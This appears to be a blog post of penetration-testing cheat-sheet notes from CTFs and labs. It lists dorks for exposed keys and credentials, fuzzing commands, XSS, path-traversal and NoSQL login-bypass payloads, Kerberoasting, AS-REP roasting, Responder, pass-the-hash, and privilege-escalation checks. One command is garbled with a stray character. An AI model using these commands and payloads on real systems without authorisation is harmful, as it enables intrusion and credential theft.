In the fast-paced world of cybersecurity, having a reliable "brain dump" is the difference between a successful engagement and a dead end. These are my personal notes, curated from countless hours of CTFs and labs, structured into a logical workflow.

1. External Recon & Information Gathering

Before touching the target, you need to know what exists.

Google & GitHub Dorking

Search engines are the most underrated hacking tools.

  • Find Exposed API Keys: intitle:"index of" api_key OR "api key" OR apiKey -pool
  • Exposed WordPress Users: inurl:"/wp-json/wp/v2/users"
  • GitHub Sensitive Data: "nasa.gov" passwd (Replace with your target domain).

Subdomain & Asset Discovery

Don't just scan a single IP; find the whole ecosystem.

  • Passive Discovery (amass):
amass enum -passive -d target.com
  • HTTP Probing: Identify which subdomains are actually alive.
cat subs.txt | sort -u | httprobe --prefer-https > live_assets.txt
  • Technology Identification: whatweb -a 1 $IP (Stealthy) or whatweb -a 3 $IP (Aggressive).

2. Web Vulnerability Research

Once you have a web target, the goal is to find entry points through fuzzing and parameter analysis.

Directory & Parameter Fuzzing

Directory Brute Force (FFUF):

ffuf -w /path/to/wordlist -u https://target/FUZZ

Virtual Host Discovery:

ffuf -w subdomains.txt -u http://target.htb/ -H "Host: FUZZ.target.htb" -fc 302

Hidden Parameter Mining: Use arjunto find parameters the developers forgot to hide.

arjun -u https://api.target.com/endpoint -m POST

Common Web Attack Payloads

XSS (Reflected):

<img src=x onerror=alert(document.cookie)>

LFI / Path Traversal:

  • Linux: ../../../../etc/passwd
  • Windows: ..\..\..\windows\win.ini

NoSQL Injection (Bypass Login):

{"username": {"$gt": ""}, "password": {"$gt": ""}}

3. Active Directory (AD) Domination

In a Windows environment, AD is the "Holy Grail." Here is the path from zero to Domain Admin.

Initial Enumeration (Port 135, 445, 88)

  • Check for Null Sessions: rpcclient $IP -U '' (Then use enumdomusers).
  • SMB Share Enumeration:
cme smb $IP --shares -u 'guest' -p ''
  • RID Cycling: If you have one set of valid creds, find all other users.
lookupsid.py domain/user:pass@$IP

Advanced AD Attacks

  • Kerberoasting: Requesting service tickets to crack offline.
GetUserSPNs.py -dc-ip $IP domain/user:pass -request
  • AS-REP Roasting: Targeting users who don't require pre-authentication.
GetNPUsers.py -dc-ip $IP -no-pass -usersfile users.txt domain/м
  • LLMNR/NBT-NS Poisoning: Use Responder to intercept hashes on the wire.
responder -I eth0 -dwP

4. Linux Post-Exploitation & PrivEsc

Once you have a shell, the real work begins.

Stabilization

Never work in a "dumb" shell. Stabilize it immediately:

python3 -c "import pty; pty.spawn('/bin/bash')"
# Then background with Ctrl+Z and run:
stty raw -echo; fg

Finding the Path to Root

  • Check SUID Binaries: Files that run as root.
find / -perm -u=s -type f 2>/dev/null
  • Capabilities: getcap -r / 2>/dev/null
  • Sudo Rights: sudo -l

Pro Tip: Always cross-reference SUID/Sudo findings with GTFOBins. If cat or perl has special permissions, it's a direct path to root.

5. Quick Reference Tables

Cracking — Hashcat

hashcat -m 1800 hash.txt rockyou.txt

Pass-the-Hash — Psexec

psexec.py user@$IP -hashes :<NT_HASH>

API Scanning — KiteRunner

kr scan http://api.target -w routes.kite

SQL Injection — SQLMap

sqlmap -r request.req --batch --dbs

Final Thoughts

Pentesting is as much about the quality of your notes as it is about the speed of your typing. This cheat sheet is a living document — keep it updated, keep it organized, and always stay curious.